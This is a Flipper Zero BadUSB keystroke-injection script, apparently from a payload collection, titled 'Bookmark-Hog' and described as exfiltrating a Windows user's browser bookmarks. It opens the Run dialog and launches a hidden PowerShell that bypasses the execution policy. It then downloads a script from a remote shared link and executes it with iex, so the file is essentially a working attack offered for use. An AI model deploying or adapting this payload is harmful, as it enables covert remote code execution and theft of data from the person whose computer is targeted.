REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the FlipperZero REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER